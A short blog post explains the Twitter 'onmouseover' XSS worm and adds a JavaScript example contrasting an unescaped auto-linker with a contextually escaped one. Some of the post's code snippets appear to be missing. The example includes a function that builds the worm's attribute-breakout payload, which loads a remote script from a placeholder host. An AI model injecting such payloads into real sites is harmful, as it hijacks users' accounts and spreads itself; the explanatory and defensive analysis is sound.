Apparently the new Twitter website is vulnerable to a simple injection attack, a cross-site scripting (XSS) bug rather than SQL injection: it just spits out to the page whatever HTML code you write in your status, unescaped.
So, the exploit works like this:
User writes the following status line:
The onmouseover event fetches and executes remote JS code from
The remote script (which, unlike the script embedded in the user's status, is not subject to the status length limit) can basically do whatever the attacker wants.
This one just manipulates the page's HTML to submit a new tweet (the status line from step #1) and spread itself on:
Besides submitting tweets, you can pretty much do whatever you want with the page's UI etc. Lots of fun...
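The following is an added example, not code from this post or from Twitter. It models one common way "spit out whatever HTML you write" turns into an onmouseover handler: an auto-linker that wraps URLs in an anchor tag without escaping the user-controlled text, so a double quote inside the "URL" closes the href attribute and everything after it becomes further attributes of the tag. The auto-linker is an assumed, simplified rendering step, the host names and the remote script address are placeholders, and the sample status is constructed for the example.

```javascript
// Assumed simplified model of a status renderer, not Twitter's actual code.
const URL_RE = /https?:\/\/\S+/g;

// Vulnerable renderer: the matched URL is spliced raw into an attribute value
// and into the link text. A double quote in the "URL" terminates href, and
// whatever follows is parsed as additional attributes of the <a> tag.
function autolinkUnsafe(status) {
  return status.replace(URL_RE, m => `<a href="${m}">${m}</a>`);
}

// Escape the characters that can end a text node or an attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Fixed renderer: same output shape, but the user text is escaped in both
// the attribute context and the text context.
function autolinkSafe(status) {
  return status.replace(URL_RE, m => `<a href="${escapeHtml(m)}">${escapeHtml(m)}</a>`);
}

// Shape of the worm's status text: a "URL" whose trailing quote breaks out of
// href, followed by an onmouseover that appends a <script> tag pointing at the
// attacker's remote file. scriptUrl is a placeholder, not the real address.
function wormStatus(scriptUrl) {
  const loader = `document.body.appendChild(document.createElement('script')).src='${scriptUrl}'`;
  return `http://t.invalid/@"onmouseover="${loader}"/`;
}

// Minimal attribute scanner: for each start tag, list attribute names that
// begin with "on". It follows the HTML tokenizer closely enough for this
// markup (a quoted value immediately followed by another attribute name is
// accepted, as browsers do), but it is a check for the example, not a parser.
function eventHandlerAttributes(html) {
  const found = [];
  const TAG_RE = /<[a-z][a-z0-9]*\s([^>]*)>/gi;
  const ATTR_RE = /([^\s"'=\/>]+)\s*(?:=\s*("[^"]*"|'[^']*'|[^\s"'>]*))?/g;
  let tag;
  while ((tag = TAG_RE.exec(html)) !== null) {
    ATTR_RE.lastIndex = 0;
    let attr;
    while ((attr = ATTR_RE.exec(tag[1])) !== null) {
      if (/^on/i.test(attr[1])) found.push(attr[1].toLowerCase());
    }
  }
  return found;
}

// Usage: render the constructed worm status both ways and compare.
const sample = wormStatus('http://example.invalid/w.js');
console.log(eventHandlerAttributes(autolinkUnsafe(sample))); // ['onmouseover']
console.log(eventHandlerAttributes(autolinkSafe(sample)));   // []
```

The point of the comparison is that the fix is contextual escaping at the place the text is written into markup, not filtering the word "onmouseover" out of statuses; a renderer that escapes `"` inside attribute values leaves the attacker with no way to start a second attribute, whatever the rest of the status contains.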
Update: This exploit is now patched.
Related articles by Zemanta
- Twitter ‘onmouseover’ security flaw widely exploited (sophos.com)
- XSS flaw discovered on Twitter (thetechherald.com)
(Cross-posted @ DeveloperZen)